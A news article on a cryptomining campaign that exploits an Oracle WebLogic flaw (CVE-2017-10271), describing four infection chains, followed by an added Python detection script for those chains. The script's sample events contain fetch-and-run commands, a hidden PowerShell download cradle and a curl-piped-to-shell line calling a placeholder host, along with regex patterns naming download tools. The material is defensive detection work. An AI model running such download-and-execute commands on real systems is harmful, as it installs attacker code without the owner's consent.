A malicious campaign that’s been exploiting a vulnerability in Oracle’s WebLogic application servers in order to install a Monero cryptominer on victims’ machines has reportedly used at least four different infection chain tactics to spread the threat worldwide, across virtually all industry sectors.
The campaign has already impacted organizations in the U.S., Australia, Hong Kong, India, Malaysia, the U.K., and Spain, according to a Feb. 15 blog post authored by FireEye researchers Rakesh Sharma, Akhil Reddy, and Kimberly Goody.
The vulnerability, CVE-2017-10271, is a remote code execution bug that also affects PeopleSoft HR and Oracle E-Business Suite software. And while it was patched late last year, server owners who have failed to apply the patch remain vulnerable to the exploit, which FireEye reports can result in a cryptominer infection, delivered via one of at least four separately observed tactics.
One method uses PowerShell to download the miner directly onto a victimized system, and ShellExecute to launch the program. Alternatively, the exploit can deliver a PowerShell script that downloads the miner from a remote server. For Linux machines there is another possibility: the exploit may deliver shell scripts that download and execute the cryptominer. And a fourth tactic uses dumped Windows credentials, the credential-extraction tool Mimikatz, and the EternalBlue Windows SMB exploit to spread laterally.
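Detection logic for the infection chains just described, as an added example that is not code from the FireEye post or this article: it labels constructed process-creation events where the WebLogic Java process spawns a PowerShell download cradle, a dropped executable, or a downloading shell script. The event field names, the parent-process and temp-path heuristics, and the sample events are assumptions, not taken from the article.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Heuristics (assumptions, tune per environment): what a WebLogic parent looks like,
# what a download cradle looks like, and which paths count as a writable drop location.
WEBLOGIC_PARENT = re.compile(r"^(java(\.exe)?|beasvc\.exe|startWebLogic)$", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b)", re.I)
TEMP_DROP = re.compile(r"(\\temp\\|\\tmp\\|appdata\\local\\temp|^/tmp/|^/dev/shm/)", re.I)

@dataclass
class ProcEvent:
    parent_image: str   # image path of the parent process
    image: str          # image path of the newly created process
    cmdline: str        # full command line of the new process

def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1]

def classify(ev: ProcEvent) -> Optional[str]:
    """Return the tactic the event resembles, or None if it is not suspicious."""
    if not WEBLOGIC_PARENT.search(basename(ev.parent_image)):
        return None                       # only children of the app server matter here
    child = basename(ev.image).lower()
    if child == "powershell.exe" and DOWNLOAD_CRADLE.search(ev.cmdline):
        return "windows-powershell-download"
    if child in ("sh", "bash", "dash") and DOWNLOAD_CRADLE.search(ev.cmdline):
        return "linux-shell-download"
    if child.endswith(".exe") and TEMP_DROP.search(ev.image):
        return "windows-dropped-binary"    # miner written to disk, then launched directly
    return None

def triage(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Index and label every event that matches one of the chains."""
    return [(i, tag) for i, ev in enumerate(events) if (tag := classify(ev))]

# Constructed sample events (not real telemetry); the last one has a benign parent.
SAMPLE = [
    ProcEvent(r"C:\Oracle\jdk\bin\java.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')"),
    ProcEvent(r"C:\Oracle\jdk\bin\java.exe", r"C:\Windows\Temp\svchost.exe", r"C:\Windows\Temp\svchost.exe -o pool"),
    ProcEvent("/usr/lib/jvm/bin/java", "/bin/sh", "sh -c 'curl -s http://example.invalid/x.sh | sh'"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Invoke-WebRequest http://example.invalid/update.txt"),
]

if __name__ == "__main__":
    for idx, tag in triage(SAMPLE):
        print(idx, tag, basename(SAMPLE[idx].image))
```

The fourth chain (Mimikatz plus EternalBlue lateral movement) is not covered here; it is better caught by credential-access and SMB-exploit detections than by parent/child process heuristics.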
The campaign appears to be similar to one that was reported last month by Morphus Labs’ Chief Research Officer Renato Marinho and SANS Technology Institute Dean of Research Johannes Ullrich, who said the same Oracle bug was used to deliver the XMRig cryptominer.
“There were multiple campaigns that leveraged the CVE-2017-10271 to subsequently distribute cryptocurrency miners. In this sense, [our blog post] wasn’t specific to a singular campaign, but rather a more cohesive look at the different tactics that we observed following exploitation of that vulnerability,” said FireEye senior analyst Kimberly Goody in an email interview today with SC Media. “With that said, based on a quick review of the indicators in the SANS blog, those campaigns appear to be different from activity sets that we were specifically referring to. We still are observing threat actors leverage CVE-2017-10271 to subsequently download cryptocurrency mining payloads as of a few hours ago.”